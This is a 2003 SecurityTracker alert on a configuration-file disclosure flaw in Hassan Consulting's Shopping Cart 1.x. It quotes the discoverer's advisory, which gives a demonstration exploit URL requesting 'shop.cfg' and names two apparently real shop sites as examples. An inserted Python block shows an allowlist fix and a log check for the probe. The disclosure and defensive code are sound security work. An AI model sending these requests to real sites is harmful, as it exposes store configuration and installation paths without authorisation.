SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
Category:  Application (Commerce)  >  Shopping Cart (Hassan)
Vendors:  Hassan Consulting
Hassan Shopping Cart Discloses Configuration Data to Remote Users
SecurityTracker Alert ID:  1007322
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jul 28 2003
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes
Version(s): 1.x
Description:  Dr`Ponidi of the Indonesia Security Development Team reported an information disclosure vulnerability in 'The Shopping Cart' from Hassan Consulting. A remote user can view the configuration file.

It is reported that a remote user can request the 'shop.cfg' file from the target web site. A demonstration exploit is provided:

http://[target]/[cgi-local]/shop.pl/page=shop.cfg

Impact:  A remote user can view the shopping cart configuration data, including the installation path.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.irata.com/products.html
Cause:  Access control error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  Dr`Ponidi Haryanto <drponidi@hackermail.com>
Message History:   None.
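The access control error above comes down to the script serving whatever file name arrives in its page selector, so a request naming 'shop.cfg' returns the configuration file. As an added example (not Hassan Consulting's code; shop.pl itself is Perl, and the template directory, allowlist and log line below are assumed), this Python shows a page resolver that only serves allowlisted templates under a fixed directory, plus a log check that flags the demonstration request:

```python
import posixpath
from typing import Optional, Tuple
from urllib.parse import unquote

# Assumed layout: page templates live under PAGE_ROOT; the configuration
# file lives elsewhere and is never a valid page name.
PAGE_ROOT = "/srv/shop/pages"
ALLOWED_PAGES = {"index", "catalog", "checkout", "contact"}  # explicit allowlist


def page_from_path_info(path_info: str) -> Optional[str]:
    """Extract NAME from PATH_INFO of the form '/page=NAME' (as in the
    advisory's URL). Returns None when no page selector is present."""
    path_info = unquote(path_info)
    prefix = "/page="
    if not path_info.startswith(prefix):
        return None
    return path_info[len(prefix):]


def resolve_page(name: Optional[str]) -> Optional[str]:
    """Map a requested page name to a template path, or None when denied.
    Rejects empty names, separators, dot-prefixed names, anything outside
    the allowlist, and any result that would escape PAGE_ROOT."""
    if not name or "/" in name or "\\" in name or name.startswith("."):
        return None
    if name not in ALLOWED_PAGES:
        return None
    candidate = posixpath.normpath(posixpath.join(PAGE_ROOT, name + ".html"))
    if not candidate.startswith(PAGE_ROOT + "/"):
        return None
    return candidate


def handle_request(path_info: str) -> Tuple[int, str]:
    """Return (HTTP status, template path or reason) for one request."""
    target = resolve_page(page_from_path_info(path_info))
    if target is None:
        return 404, "page not found"
    return 200, target


def flags_config_probe(access_log_line: str) -> bool:
    """Detection helper for Common Log Format lines: flag requests that
    reach shop.cfg through shop.pl, the pattern in the advisory."""
    parts = access_log_line.split('"')
    if len(parts) < 2:
        return False
    request = parts[1]                      # e.g. 'GET /path HTTP/1.0'
    fields = request.split(" ")
    path = unquote(fields[1] if len(fields) > 1 else fields[0]).lower()
    return "shop.pl" in path and "shop.cfg" in path
```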


 Source Message Contents

Date:  Mon, 28 Jul 2003 14:58:48 +0800
From:  Dr`Ponidi Haryanto <drponidi@hackermail.com>
Subject:  Hassan Consulting's Shopping Cart Version 1.x Path Disclosure

 

Indonesia Security Development Team Advisory

Hassan Consulting's Shopping Cart Version 1.x Path Disclosure
=============================================================================

    Advisory Name: Hassan Consulting's Shopping Cart Version 1.x Path Disclosure
     Release Date: 8:31 28/07/03
      Application: Hassan Consulting's Shopping Cart Version 1.x
         BUG Type: Security Leak
           Author: Dr`Ponidi <drponidi@indonesia.or.id>
      Discover by: Dr`Ponidi <drponidi@indonesia.or.id>
Acknowledgments : Vulnerability discovery, exploit code, and advisory by Dr`Ponidi
    Vendor Status: See below.
       Vendor URL: http://www.irata.com
        Reference: http://drponidi.5u.com/advisory
        Greetz to: #xnuxer,#phracker,#dhegleng,#k-elektronik @ irc.dal.net



[Details]
Simple path disclosure, directory traversal with file read ability,
and listing of files in all directories in some cases. Just depends on the version of the code.

[Exploit]
http://[www.target.com]/[cgi-local]/[shop.pl]/[shop.cfg]

[Example]
http://www.startthehealing.com/cgi-local/shop.pl/page=shop.cfg
http://aaaim.com/cgi-local/shop991/shop.pl/page=shop.cfg


[About Indonesia Security Development Team]
Indonesia Security Development Team researches and develops intelligent, advanced application
security assessment. Based in Indonesia, Indonesia Security Development Team offers best of
breed security consulting services, specialising in shopping cart software and network
security assessments. We provide security information and patches for use by the entire
security network community.

This information is provided freely to all interested parties and may be redistributed provided
that it is not altered in any way, the author is appropriately credited and the document retains.

Indonesia Security Development Team Advisory:
http://drponidi.5u.com/advisory

___________________________________________________________________________________________
Dr`Ponidi <drponidi@indonesia.or.id>
Original document can be found at http://drponidi.5u.com/advisory

Copyright 2002, SecurityGlobal.net LLC